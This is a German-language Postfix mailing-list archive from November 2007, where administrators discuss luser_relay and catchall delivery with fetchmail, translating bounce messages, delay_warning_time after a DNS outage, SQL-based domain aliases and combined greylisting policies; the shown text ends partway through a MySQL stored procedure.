eine Webseite auf denen du diese Meldungen übersetzt Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From nighthawk at gmail.com Thu Nov 15 18:17:48 2007 From: nighthawk at gmail.com (nighthawk) Date: Thu, 15 Nov 2007 18:17:48 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <01af01c827a5$84e86910$8eb93b30$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> <01af01c827a5$84e86910$8eb93b30$@de> Message-ID: <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> On Nov 15, 2007 5:35 PM, wrote: > Nein, den Bounce schicke doch ich (mein Postfix). > > z.B. meldet (bounced) mein Postfix, dass das Postfach voll ist. Ja, aber es kann Dir doch völlig egal sein, wenn die Absender von Mails an Deine Kunden der englischen Sprache nicht mächtig sind. Deine Kunden sehen Meldungen die andere Mailserver erzeugen und genau _die_ kannst Du nicht ändern. Oder verstehe ich Dich total falsch? Oder schicken sich Deine Kunden selber Mails von fremden Servern (... um Fehlermeldungen zu sammeln?)? From s.neukirchner at konabi.de Thu Nov 15 15:48:03 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Thu, 15 Nov 2007 15:48:03 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden Message-ID: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> Hallo, ich habe einen lokalen Mailserver welcher über Fetchmail Mails abruft und an Postfix übergibt. Nun möchte ich unzustellbare Mails an einen Benutzer weiterleiten. Dazu habe ich in der main.cf des lokalen Mailservers folgenden Eintrag vorgenommen: luser_relay = benutzer Wenn ich nun Mails über fetchmail abrufe und eine unzustellbare Mail Dabei ist bricht Postfix die Verbindung ab: fetchmail: SMTP< 220 asterisk ESMTP Postfix (Debian/GNU) fetchmail: SMTP> EHLO localhost fetchmail: SMTP< 250-asterisk fetchmail: SMTP< 250-PIPELINING fetchmail: SMTP< 250-SIZE 10240000 fetchmail: SMTP< 250-VRFY fetchmail: SMTP< 250-ETRN fetchmail: SMTP< 250 8BITMIME fetchmail: SMTP> MAIL FROM: SIZE=2648 fetchmail: SMTP< 250 Ok fetchmail: SMTP> RCPT TO: fetchmail: SMTP< 550 : Recipient address rejected: User unknown in local recipient table fetchmail: SMTP-Fehler: 550 : Recipient address rejected: User unknown in local recipient table fetchmail: SMTP-Lauscher mag Empfängeradresse ,,test at localhost" nicht gethostbyname fehlgeschlagen für asterisk Aber diese Mail sollte doch dank luser_relay = benutzer angenommen werden und an benutzer weitergeleitet werden. Anbei die fetchmailrc: set no bouncemail set postmaster benutzer poll mail.domain.de proto pop3 nodns envelope 2 "Received" aka domain1.de domain2.net user "userbame" pass "passwort" is * Danke für Eure Hilfe. Sven From mrg at unimx.de Fri Nov 16 00:15:33 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Fri, 16 Nov 2007 00:15:33 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> <01af01c827a5$84e86910$8eb93b30$@de> <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> Message-ID: <022201c827dd$6c5dee50$4519caf0$@de> Genau, es schicken meinen Users irgendwelche Leute Mails (z.B. Lieferanten). Das Postfach meines Users ist voll. Der Lieferant bekommt die Meldung "Over Quota". Mich ruft mein User an und sagt: Ihr Mailsystem ist kaputt, es meldet meinem Lieferanten "Over Quota". Und dann geht das erklären los. Der Lieferant weiß nicht was los ist, und der User denkt mein Mailsystem spinnt. Wenn da stehen würde: Mailbox full / Mailbox voll wäre alles für alle klar. Jetzt verstanden :) Grüße Martin From nighthawk at gmail.com Fri Nov 16 01:35:32 2007 From: nighthawk at gmail.com (nighthawk) Date: Fri, 16 Nov 2007 01:35:32 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <022201c827dd$6c5dee50$4519caf0$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> <01af01c827a5$84e86910$8eb93b30$@de> <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> <022201c827dd$6c5dee50$4519caf0$@de> Message-ID: <7832fd560711151635q79466824n25b798dbbd2df711@mail.gmail.com> On Nov 16, 2007 12:15 AM, wrote: > Genau, es schicken meinen Users irgendwelche Leute Mails (z.B. Lieferanten). > > Das Postfach meines Users ist voll. Der Lieferant bekommt die Meldung "Over > Quota". > > Mich ruft mein User an und sagt: Ihr Mailsystem ist kaputt, es meldet meinem > Lieferanten "Over Quota". > Und dann geht das erklären los. > Der Lieferant weiß nicht was los ist, und der User denkt mein Mailsystem > spinnt. > > Wenn da stehen würde: Mailbox full / Mailbox voll wäre alles für alle klar. > > Jetzt verstanden :) Seltsame Leute hast Du da.. Die können das Konzept "Email" noch nicht richtig verstanden haben. Aber was soll man auch bei jemandem erwarten, der zwei englische Worte nicht übersetzt bekommt. Was ich Dir als Lösung empfehlen würde, wäre eine Erweiterung der Quotas (sofern der Plattenplatz und das Sicherungskonzept es hergeben) oder mit irgendeinem (billigen) Script Warnmails an deine Kunden zu erzeugen, wenn 70 oder 80% Füllstand erreicht sind. In diesen Mails könnte man auch eindeutige, deutsche Hinweise unterbringen, daß bei Empfang weiterer x MB nachfolgende Emails unwiederruflich an den Absender zurückgeschickt werden. From jk at jkart.de Fri Nov 16 01:49:30 2007 From: jk at jkart.de (Jim Knuth) Date: Fri, 16 Nov 2007 01:49:30 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <7832fd560711151635q79466824n25b798dbbd2df711@mail.gmail.com> References: <000d01c826fe$8536d110$8fa47330$@de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> <01af01c827a5$84e86910$8eb93b30$@de> <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> <022201c827dd$6c5dee50$4519caf0$@de> <7832fd560711151635q79466824n25b798dbbd2df711@mail.gmail.com> Message-ID: <473CE91A.1070601@jkart.de> nighthawk schrieb: > On Nov 16, 2007 12:15 AM, wrote: >> Genau, es schicken meinen Users irgendwelche Leute Mails (z.B. Lieferanten). >> >> Das Postfach meines Users ist voll. Der Lieferant bekommt die Meldung "Over >> Quota". >> >> Mich ruft mein User an und sagt: Ihr Mailsystem ist kaputt, es meldet meinem >> Lieferanten "Over Quota". >> Und dann geht das erklären los. >> Der Lieferant weiß nicht was los ist, und der User denkt mein Mailsystem >> spinnt. >> >> Wenn da stehen würde: Mailbox full / Mailbox voll wäre alles für alle klar. >> >> Jetzt verstanden :) > > Seltsame Leute hast Du da.. Die können das Konzept "Email" noch nicht > richtig verstanden haben. Aber was soll man auch bei jemandem > erwarten, der zwei englische Worte nicht übersetzt bekommt. wie sagt Ralf H. immer so schön (interpretiert): "Die User verstehen auch keine deutschen Fehlermeldungen .." Also, was solls?! *scnr* > Was ich Dir als Lösung empfehlen würde, wäre eine Erweiterung der > Quotas (sofern der Plattenplatz und das Sicherungskonzept es hergeben) > oder mit irgendeinem (billigen) Script Warnmails an deine Kunden zu > erzeugen, wenn 70 oder 80% Füllstand erreicht sind. In diesen Mails > könnte man auch eindeutige, deutsche Hinweise unterbringen, daß bei > Empfang weiterer x MB nachfolgende Emails unwiederruflich an den > Absender zurückgeschickt werden. -- mit freundlichem Gruss - with kind regard Jim Knuth #ICQ 277289867 From postfixbuch at cboltz.de Fri Nov 16 01:54:34 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Fri, 16 Nov 2007 01:54:34 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden In-Reply-To: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> References: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> Message-ID: <200711160154.35223@tux.boltz.de.vu> Hallo Sven, hallo Leute, Am Donnerstag, 15. November 2007 schrieb Sven Neukirchner: > ich habe einen lokalen Mailserver welcher über Fetchmail Mails abruft > und an Postfix übergibt. > > Nun möchte ich unzustellbare Mails an einen Benutzer weiterleiten. [werden von Postfix mit "User unknown" abgelehnt] > Anbei die fetchmailrc: > > set no bouncemail > set postmaster benutzer Laut fetchmail-manpage sollten nicht zustellbare Mails an den als Postmaster festgelegten Benutzer gehen. Scheint allerdings in Deinem Fall nicht zu funktionieren... Auf die Gefahr hin, gesteinigt zu werden: Lege doch einfach einen Catchall an, der den gewünschten Benutzer als Ziel hat. (Ja, ich weiß, dass ich gerade das böse C....all-Wort verwendet habe. Bei einem internen Server habe ich aber keine so großen Bedenken.) Gruß Christian Boltz -- > [SuSE vs. SUSE] A good question. Maybe the friend of ... had > a company which needed urgently some money? Sorry, I can't follow you there. Do you mean there's a company that sells capital U's? [> Thorsten Kukuk and Rasmus Plewe] From ml at awinkelmann.de Fri Nov 16 07:26:44 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 16 Nov 2007 07:26:44 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden In-Reply-To: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> References: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> Message-ID: <200711160726.44615.ml@awinkelmann.de> On Donnerstag, 15. November 2007, Sven Neukirchner wrote: > ich habe einen lokalen Mailserver welcher über Fetchmail Mails abruft und > an Postfix übergibt. > > Nun möchte ich unzustellbare Mails an einen Benutzer weiterleiten. > > Dazu habe ich in der main.cf des lokalen Mailservers folgenden Eintrag > vorgenommen: > > luser_relay = benutzer > > Wenn ich nun Mails über fetchmail abrufe und eine unzustellbare Mail > Dabei ist bricht Postfix die Verbindung ab: > > fetchmail: SMTP< 220 asterisk ESMTP Postfix (Debian/GNU) > fetchmail: SMTP> EHLO localhost > fetchmail: SMTP< 250-asterisk > fetchmail: SMTP< 250-PIPELINING > fetchmail: SMTP< 250-SIZE 10240000 > fetchmail: SMTP< 250-VRFY > fetchmail: SMTP< 250-ETRN > fetchmail: SMTP< 250 8BITMIME > fetchmail: SMTP> MAIL FROM: SIZE=2648 > fetchmail: SMTP< 250 Ok > fetchmail: SMTP> RCPT TO: > fetchmail: SMTP< 550 : Recipient address rejected: User > unknown in local recipient table > fetchmail: SMTP-Fehler: 550 : Recipient address rejected: > User unknown in local recipient table > fetchmail: SMTP-Lauscher mag Empfängeradresse ,,test at localhost" nicht > gethostbyname fehlgeschlagen für asterisk > > Aber diese Mail sollte doch dank luser_relay = benutzer angenommen werden > und an benutzer weitergeleitet werden. http://www.postfix.org/postconf.5.html#luser_relay ... Note: if you use this feature for accounts not in the UNIX password file, then you must specify "local_recipient_maps =" (i.e. empty) in the main.cf file, otherwise the Postfix SMTP server will reject mail for non-UNIX accounts with "User unknown in local recipient table". ... -- Andreas From s.neukirchner at konabi.de Fri Nov 16 07:43:58 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Fri, 16 Nov 2007 07:43:58 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden In-Reply-To: <200711160154.35223@tux.boltz.de.vu> References: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> <200711160154.35223@tux.boltz.de.vu> Message-ID: <036301c8281c$1164c070$96ffa8c0@nicos.local> Hallo Christian, danke für den Hinweis, so kann ich es machen. Da auf dem Internetserver nicht alle Mails angenommen werden, sondern nur für konfigurierte Mailadressen, habe ich bei der lokalen Catchall Mailbaox keine Bedenken. Danke Sven -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Christian Boltz Gesendet: Freitag, 16. November 2007 01:55 An: postfixbuch-users at listi.jpberlin.de Betreff: Re: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden Hallo Sven, hallo Leute, Am Donnerstag, 15. November 2007 schrieb Sven Neukirchner: > ich habe einen lokalen Mailserver welcher über Fetchmail Mails abruft > und an Postfix übergibt. > > Nun möchte ich unzustellbare Mails an einen Benutzer weiterleiten. [werden von Postfix mit "User unknown" abgelehnt] > Anbei die fetchmailrc: > > set no bouncemail > set postmaster benutzer Laut fetchmail-manpage sollten nicht zustellbare Mails an den als Postmaster festgelegten Benutzer gehen. Scheint allerdings in Deinem Fall nicht zu funktionieren... Auf die Gefahr hin, gesteinigt zu werden: Lege doch einfach einen Catchall an, der den gewünschten Benutzer als Ziel hat. (Ja, ich weiß, dass ich gerade das böse C....all-Wort verwendet habe. Bei einem internen Server habe ich aber keine so großen Bedenken.) Gruß Christian Boltz -- > [SuSE vs. SUSE] A good question. Maybe the friend of ... had > a company which needed urgently some money? Sorry, I can't follow you there. Do you mean there's a company that sells capital U's? [> Thorsten Kukuk and Rasmus Plewe] -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From Rainer.Wiesenfarth at inpho.de Fri Nov 16 09:23:54 2007 From: Rainer.Wiesenfarth at inpho.de (Rainer Wiesenfarth) Date: Fri, 16 Nov 2007 09:23:54 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <473CE91A.1070601@jkart.de> References: <000d01c826fe$8536d110$8fa47330$@de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> <01af01c827a5$84e86910$8eb93b30$@de> <7832fd560711150917q12fb7300j2f1532c6212e38c3@mail.gmail.com> <022201c827dd$6c5dee50$4519caf0$@de> <7832fd560711151635q79466824n25b798dbbd2df711@mail.gmail.com> <473CE91A.1070601@jkart.de> Message-ID: <473D539A.900@inpho.de> Jim Knuth schrieb: > [...] > wie sagt Ralf H. immer so schön (interpretiert): "Die User > verstehen auch keine deutschen Fehlermeldungen .." Also, was > solls?! *scnr* > [...] (ins OT abdriftend ...) Das stimmt leider viel zu oft. Mal der sinngemäße Auszug aus einem Gespräch mit einem User, der durchaus des Englischen mächtig ist: User: "Wenn ich dem Kunden eine Mail schicke, kommt immer eine Fehlermeldung." Admin: "Was steht denn in der Meldung?" User: "Irgendwelche Zahlen und 'Error'." Admin: "Kannst Du noch mal nachschauen, was da genau da steht?" User: "Ja, Moment ... Da steht '... User unknown ...'. Was heißt das?" Admin: "Öhm, dass es den Benutzer nicht gibt? Hast Du Dich vertippt?" User: "Ah, ok, das wars. Das kann der aber auch gleich sagen! Danke." Fazit für mich: - Seit es Windows gibt, liest keiner mehr Fehlermeldungen, sondern klickt nur "OK" (auch oft genug erlebt). - Wenn es keinen "OK" Button gibt, ruft man den Admin an. - Wenn ich Anrufe bekomme, ist die erste Antwort: "Lies Dir die Fehlermeldung mal durch, versuch sie zu verstehen und wenn das nicht klappt, ruf wieder an ..." - aber ich habe zum Glück keine zahlenden User, sondern nur Kollegen ... Best Regards / Mit freundlichen Grüßen Rainer Wiesenfarth -- INPHO GmbH * Smaragdweg 1 * 70174 Stuttgart * Germany phone: +49 711 2288 10 * fax: +49 711 2288 111 * web: www.inpho.de place of business: Stuttgart * managing director: Johannes Saile commercial register: Stuttgart, HRB 9586 Leader in Photogrammetry and Digital Surface Modelling -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3277 bytes Beschreibung: S/MIME Cryptographic Signature URL : From s.neukirchner at konabi.de Fri Nov 16 13:23:52 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Fri, 16 Nov 2007 13:23:52 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden In-Reply-To: <200711160726.44615.ml@awinkelmann.de> References: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> <200711160726.44615.ml@awinkelmann.de> Message-ID: <00d901c8284b$8cd16310$96ffa8c0@nicos.local> Hallo Andreas, danke für den Hinweis. Der Benutzer hat einen Account mit dem selben Namen auf dem Linux Rechner und somit auch einen Eintrag in der passwd. Sven http://www.postfix.org/postconf.5.html#luser_relay ... Note: if you use this feature for accounts not in the UNIX password file, then you must specify "local_recipient_maps =" (i.e. empty) in the main.cf file, otherwise the Postfix SMTP server will reject mail for non-UNIX accounts with "User unknown in local recipient table". ... -- Andreas -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From postfix at linuxmaker.de Fri Nov 16 14:12:32 2007 From: postfix at linuxmaker.de (Andreas =?iso-8859-1?Q?G=FCnther?=) Date: Fri, 16 Nov 2007 14:12:32 +0100 (CET) Subject: [Postfixbuch-users] Versand von Fehlermeldung bei "Connection timed out" Message-ID: <45667.84.161.95.247.1195218752.squirrel@www.it-netzwerkservice.net> Hallo Kollegen, ich habe gestern auf einem Postfix/Cyrus-Server ein ernsthaftes Versandproblem gehabt, so dass die Mailqueue nach 5 Stunden recht voll war. Hintergrund war ein DNS-Server bei der T-COM, was hier bereits beschrieben wird http://www.heise.de/netze/hilfe/foren/go.shtml?read=1&msg_id=13692733&forum_id=104470 Ich habe mich an der IP-Adresse 217.6.164.179 zunächst gestört, weil die des SMPT-Relayservers anders lautet, aber 217.6.164.179 anpingbar war. Nov 15 10:33:27 samba postfix/smtp[30393]: connect to smtp.remax.de[217.6.164.179]: Connection timed out (port 25) Nov 15 10:33:27 samba postfix/smtp[30393]: BD53AD2D6B: to=, relay=none, delay=172592, delays=172562/0.03/30/0, dsn=4.4.1, status=deferred (connect to smtp.remax.de[217.6.164.179]: Connection timed out) Nov 15 10:33:27 samba postfix/smtp[30392]: connect to smtp.remax.de[217.6.164.179]: Connection timed out (port 25) Dann bin ich auf diesen Artikel bei Heise gestossen und habe natürlich die DNS-Einträge in der /etc/resolv.conf geändert, womit das Problem behoben war. Jetzt ist meine Frage. Kann ich Postfix so einstellen, dass eine Mail in der Mailqueue mit dem Label "Connection timed out" und das seit meinetwegen 20 Minuten an den Absender zurückgeschickt wird? Am besten wäre natürlich der Absender bekommt die Mail zurück mit der Nachricht "Mail konnte wegen Verbindungsfehler nicht gesendet werden (Postfix)". Dann wissen die Anwender Bescheid und können früher den Fehler melden. Oder gibt ein Linux-Tool, das ohne Mailversand den Zustand der Mailqueue remote überwachen und dann eben rechtzeitig Alarm schlägt? Vielen Dank! Gruss Andreas From driessen at fblan.de Fri Nov 16 14:51:00 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 16 Nov 2007 14:51:00 +0100 Subject: [Postfixbuch-users] Versand von Fehlermeldung bei "Connection timedout" In-Reply-To: <45667.84.161.95.247.1195218752.squirrel@www.it-netzwerkservice.net> References: <45667.84.161.95.247.1195218752.squirrel@www.it-netzwerkservice.net> Message-ID: <000d01c82857$b88ad070$0565a8c0@uwe> On Behalf Of Andreas Günther > Dann bin ich auf diesen Artikel bei Heise gestossen und habe > natürlich die > DNS-Einträge in der /etc/resolv.conf geändert, womit das > Problem behoben > war. wie wäre es denn wenn du einen eigenen DNS installierst z.B. PowerDNS recursor der cached die Anfragen und kann auch so eingestellt werden das die Rootserver abgefragt werden dann hast du relative Sicherheit das da nicht ein DNS Server mal mucken macht Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Fri Nov 16 17:16:12 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 16 Nov 2007 17:16:12 +0100 Subject: [Postfixbuch-users] Unzustellbare Mail aneinen Benutzer senden In-Reply-To: <00d901c8284b$8cd16310$96ffa8c0@nicos.local> References: <00dc01c82796$86fc79d0$96ffa8c0@nicos.local> <200711160726.44615.ml@awinkelmann.de> <00d901c8284b$8cd16310$96ffa8c0@nicos.local> Message-ID: <200711161716.12773.ml@awinkelmann.de> On Freitag, 16. November 2007, Sven Neukirchner wrote: > danke für den Hinweis. > Der Benutzer hat einen Account mit dem selben Namen auf dem Linux Rechner > und somit auch einen Eintrag in der passwd. Das bezieht sich nicht auf die Adresse in luser_relay sondern auf alle anderen, für die luser_relay die Alternative darstellt. Wenn luser_relay auf was unbekanntes zeigen würde, wäre das ja äusserst sinnfrei. > http://www.postfix.org/postconf.5.html#luser_relay > > ... > Note: if you use this feature for accounts not in the UNIX password file, > then > you must specify "local_recipient_maps =" (i.e. empty) in the main.cf file, > otherwise the Postfix SMTP server will reject mail for non-UNIX accounts > with "User unknown in local recipient table". > ... -- Andreas From postfixbuch-users at japantest.homelinux.com Fri Nov 16 18:37:01 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Fri, 16 Nov 2007 18:37:01 +0100 Subject: [Postfixbuch-users] Versand von Fehlermeldung bei "Connection timed out" In-Reply-To: <45667.84.161.95.247.1195218752.squirrel@www.it-netzwerkservice.net> References: <45667.84.161.95.247.1195218752.squirrel@www.it-netzwerkservice.net> Message-ID: <473DD53D.6030501@japantest.homelinux.com> Andreas Günther wrote: > Hallo Kollegen, > > ich habe gestern auf einem Postfix/Cyrus-Server ein ernsthaftes > Versandproblem gehabt, so dass die Mailqueue nach 5 Stunden recht voll > war. [...] > Jetzt ist meine Frage. Kann ich Postfix so einstellen, dass eine Mail in > der Mailqueue mit dem Label "Connection timed out" und das seit > meinetwegen 20 Minuten an den Absender zurückgeschickt wird? Am besten > wäre natürlich der Absender bekommt die Mail zurück mit der Nachricht > "Mail konnte wegen Verbindungsfehler nicht gesendet werden (Postfix)". > Dann wissen die Anwender Bescheid und können früher den Fehler melden. Dafür ist delay_warning_time vorgesehen. Wenn eine Mail innerhalb der dort angegebenen Zeit nicht zugestellt werden kann, dann erhält der Absender eine Status-Mail über die temporäre Verzögerung. delay_warning_time = 1h > Oder gibt ein Linux-Tool, das ohne Mailversand den Zustand der Mailqueue > remote überwachen und dann eben rechtzeitig Alarm schlägt? Davon gibt es viele. Du kannst im einfachsten Fall ein Script per Cron alle halbe Stunde laufen lassen, dass dir eine Mail schickt wenn mehr als eine bestimmte Anzahl von Mails in der aktiven Queue oder in deferred sind. Natürlich gibt es auch Überwachungstools wie Nagios, Munin etc, wo die den Status der Queue graphisch verfolgen kannst. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From postfixbuch at cboltz.de Fri Nov 16 22:42:54 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Fri, 16 Nov 2007 22:42:54 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <60190.80.87.162.117.1195046416.squirrel@aachalon.de> References: <4739D970.3030403@rbmail.ch> <473A2A6D.3010408@japantest.homelinux.com> <60190.80.87.162.117.1195046416.squirrel@aachalon.de> Message-ID: <200711162242.55266@tux.boltz.de.vu> Hallo Christian, hallo Sandy, hallo Leute, eine Möglichkeit gibt es - lass den Domain-Alias auf Datenbankebene erstellen ;-) Statt query = SELECT goto FROM alias WHERE address='%s' AND active = '1' müsste folgendes funktionieren: query = SELECT goto FROM alias WHERE address=replace('%s', 'aliasdomain.de', 'domain.de') AND active = '1' "Müsste", weil das ganze nur eine Idee und ungetestet ist. Ich muss wohl nicht extra erwähnen, dass das Ganze nur bei wenigen Domain-Aliasen praktikabel ist - je nach Schmerzgrenze wird es ab 10 oder 20 verschachtelten replace() unübersichtlich. Wenn die Schmerzgrenze überschritten wird, erstellt man eine stored function [1], die die Ersetzung direkt in der Datenbank macht. Innerhalb dieser Funktion kann man dann einen SELECT auf eine Ersetzungstabelle machen. Damit hat man das Problem der Unübersichtlichkeit gelöst. Außerdem wird das Ganze auch bei vielen Alias-Domains nicht langsamer. Falls jemand die Variante mit der stored function angeht: Bitte die Funktion hier posten - dürfte noch mehr Leute interessieren! Gruß Christian Boltz [1] http://dev.mysql.com/doc/refman/5.1/en/stored-procedures.html -- Ich selbst benutze kweather nicht (ich guck einfach aus dem Fenster). [Hartmut Meyer in suse-linux] From joern at bredereck.net Sat Nov 17 00:26:06 2007 From: joern at bredereck.net (joern at bredereck.net) Date: Sat, 17 Nov 2007 00:26:06 +0100 (CET) Subject: [Postfixbuch-users] =?iso-8859-1?q?Greylisting-Policies_verkn=FCp?= =?iso-8859-1?q?fen?= Message-ID: Hallo, wie bekomme ich es hin, E-Mails an eine bestimmte Domain grundsätzlich zu greylisten, aber trotzdem bestimmte Absender im Kontext dieses Greylistings wiederum zu whitelisten? Mein Setup sieht momentan so aus: smtpd_restriction_classes = greylist_policy greylist_policy = check_policy_service inet:127.0.0.1:60000 smtpd_recipient_restrictions = check_sender_access pcre:/etc/postfix/greylist_from_enabled.pcre check_recipient_access pcre:/etc/postfix/greylist_enabled.pcre In /etc/postfix/greylist_from_enabled.pcre habe ich die Absender stehen, die entweder auf jeden Fall (mit em Target "greylist_policy") oder auf keinen Fall (mit dem Target "DUNNO") gegreylistet werden sollen. Genauso in der /etc/postfix/greylist_enabled.pcre: Zu greylistende Empfänger stehen mit dem Targe "greylist_policy" drin und nicht zu greylistende mit dem Target "DUNNO". Wie bekomme ich es hin, dass die beiden Bedingungen miteinadner verknüpft werden? Also dass das Whitelisting in der /etc/postfix/greylist_from_enabled.pcre auch dann gilt, wenn der Adressat der betreffenden E-Mail auf eine zu greylistende Domain in der /etc/postfix/greylist_enabled.pcre matched? Oder einfacher gesagt: Wie bekomme ich es hin, dass nur dann das Target "greylist_policy" zum Tragen kommt, wenn eine E-Mail auf beide Bedinungungen ( check_sender_access UND check_recipient_access) matched? Kann man die beiden Checks irgendwie verschachteln? Gruß, Jörn From jonasge at gmx.net Sat Nov 17 02:00:20 2007 From: jonasge at gmx.net (Jonas Genannt) Date: Sat, 17 Nov 2007 02:00:20 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <200711162242.55266@tux.boltz.de.vu> References: <4739D970.3030403@rbmail.ch> <473A2A6D.3010408@japantest.homelinux.com> <60190.80.87.162.117.1195046416.squirrel@aachalon.de> <200711162242.55266@tux.boltz.de.vu> Message-ID: <20071117020020.03c94e2c@valentina.brachium-system.net> Hallo, >Wenn die Schmerzgrenze überschritten wird, erstellt man eine stored >function [1], die die Ersetzung direkt in der Datenbank macht. an sowas habe ich vor einiger Zeit fuer mein CpVES gebastelt, jedoch nicht weiter verfolgt. Hier mein Ergbnis bisher: TabellenInfos: Tabelle: domains +----+-----------------+ | id | dnsname | +----+-----------------+ | 1 | foo.com | | 2 | test_de.name.de | +----+-----------------+ Tabelle: users +----+------------------------------+ | id | email | +----+------------------------------+ | 3 | bar at foo.com | +----+------------------------------+ Tabelle: test (fuer das mapping domain -> domain) +----+-------+-----+ | id | fromd | tod | +----+-------+-----+ | 5 | 2 | 1 | +----+-------+-----+ Erklaerung: Die fromd ID ist die Domain A, die auf tod ID Domain B weitergeleitet wird. Also wird hier in dem Beispiel @test_de.name.de -> @foo.com gemappt. Ich habe nun eine Procedure erzeugt, der man die E-Mailadresse uebergibt: call test_1("bar at test_de.name.de", @z, at e, @r); select @z, at e, at r; +-----------------+---------+-------------+ | @z | @e | @r | +-----------------+---------+-------------+ | test_de.name.de | foo.com | bar at foo.com | +-----------------+---------+-------------+ Somit mappt meine Procedure den User bar at test_de.name.de auf bar at foo.com ueber die Tabelle test. Meine Procedure sieht so aus: create procedure test_1 ( IN addresse VARCHAR(255), OUT fromd1 VARCHAR(255), OUT fromd2 VARCHAR(255), OUT emailout VARCHAR(255) ) BEGIN DECLARE pos_id INT DEFAULT 0; select b.id,a.dnsname INTO pos_id,fromd1 from domains AS a LEFT JOIN test AS b ON b.fromd=a.id WHERE a.dnsname = 